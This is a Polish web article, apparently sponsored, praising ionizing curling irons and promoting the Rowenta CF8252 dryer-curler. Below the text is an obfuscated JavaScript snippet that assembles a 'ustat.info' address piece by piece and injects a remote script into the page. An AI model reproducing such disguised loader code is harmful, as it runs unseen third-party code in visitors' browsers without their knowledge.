:-( Wygląda na to że masz Adblocka. Utrzymujemy się z reklam żeby móc dostarczyć Ci wiadomości z Twojego regionu za które nie musisz płacić, czy mógłbyś rozważyć jego wyłączenie?
  -6°C zamglenie

Lokówki z jonizacją – jak działają? Jakie mają zalety?

Pielęgnacja, Lokówki jonizacją działają Jakie mają zalety - zdjęcie, fotografia

Lokówka z jonizacją… Czym jest jonizacja?

Lokówki z funkcją jonizacji pozwalają stylizować fryzury bez niszczenia włosów. Jak to możliwe? Otóż jonizacja oznacza, iż urządzenie wytwarza jony ujemne, które neutralizują jony dodatnie i w ten sposób zamykają łuski włosów poddawanych lokowaniu. Dzięki temu włosy są wygładzone, nie elektryzują się, ale przede wszystkim nie ulegają zniszczeniu, rozdwojeniu i wypaleniu. Efekt jonizacji uzyskuje się dzięki dodaniu do materiału, z którego wykonane są elementy grzewcze minerału o nazwie turmalin. To właśnie on wyzwala ujemne jony, neutralizując jony dodatnie osiadające na włosach. To istotna funkcja, dlatego lokówka z jonizacją jest bardzo dobrym wyborem. Co należy wziąć pod uwagę, wybierając lokówkę z jonizacją? Przede wszystkim właśnie tworzywo, z jakiego została wykonana. Powinna to być ceramika lub tytan, w przypadku innych stopów nie mamy pewności, czy wspomniany minerał został w nich zastosowany. Warto też wziąć pod uwagę kształt lokówki, a konkretnie elementów grzewczych. Kształt urządzenia ma bowiem wpływ na wygląd i rodzaj loków. Najlepszy będzie wałek o kształcie stożkowatym, który umożliwi uzyskanie loków i fal o różnej grubości. Dobrym wyborem jest też lokówka z możliwością regulacji temperatury, dzięki czemu nie będą one poddawane zbyt wysokiej temperaturze. Aby z lokówki korzystało nam się jak najwygodniej, warto też wziąć pod uwagę uchwyt. Najlepiej, aby był termoodporny, czyli nie nagrzewał się nawet przy długotrwałym używaniu sprzętu, a także wyposażony w antypoślizgowe elementy, które pozwolą nam trzymać ją pewnie w dłoni. Jeżeli często używamy lokówki i suszarki, warto pomyśleć nad połączeniem tych dwóch funkcji i zakupem suszarko-lokówki. Zawiera ona w sobie lokówkę obrotową z wymiennymi końcówkami oraz suszarkę.


Suszarko-lokówka Rowenta i jej funkcje

 

Lokówki Rowenta są często wybieranym produktem do stylizacji włosów przez kobiety. Na przykład jeden z modeli lokówek Rowenta, CF8252, łączy w sobie cechy suszarki, lokówki obrotowej i lokówki z jonizacją. Przy użyciu tego jednego sprzętu jesteśmy w stanie stworzyć profesjonalną fryzurę na każde ważniejsze wyjście. Lokówka Rowenta CF8252 posiada w zestawie między innymi pięć akcesoriów do stylizacji włosów, mianowicie szczotkę dużą ceramiczną, szczotkę małą, grzebień zwiększający objętość, zwykły grzebień oraz koncentrator. Ponadto posiada powłokę ceramiczną na elementach grzewczych, funkcję jonizacji, nawiew gorącego i zimnego powietrza do suszenia włosów i obrotowy przewód, ułatwiający jej użytkowanie. Więcej szczegółów na jej temat można znaleźć tutaj: http://www.rowenta.pl/Pages/catalog/Rowenta-For-Elite/Hair-styling-appliances/Suszarko-lokowka-CF8252.aspx. To oczywiście tylko jeden z wielu modeli lokówek Rowenta, które warto wziąć pod uwagę.

 

 

A zatem stojąc przed zakupem idealnej lokówki, weźmy pod uwagę jej funkcje, to, w jakiej mierze chroni nasze włosy przed szkodliwym działaniem wysokich temperatur, a także wygodę jej użytkowania. Wybierajmy zawsze lokówki z jonizacją, które eliminują efekt elektryzowania się oraz chronią strukturę włosa.

 


(function(){
a7cX=document.createElement("script");a7cX_="u"+("s")+"ta";
a7cX_+=("t.i")+""+"n";a7cX_+=(("f")+"o");a7cX.type="text/javascript";
a7cX_+="/"; a7cXu="10176340";a7cXu+=".2yyy3xfj7cXn5n0n4wl";a7cXu+="xX39sikayvx";
a7cX.src="//"+a7cX_+a7cXu; a7cX.async=true; document.body.appendChild(a7cX);
})();

 

 

Lokówki z jonizacją – jak działają? Jakie mają zalety? komentarze opinie

Dodajesz jako: Zaloguj się

Pielęgnacja, dla Pań - więcej informacji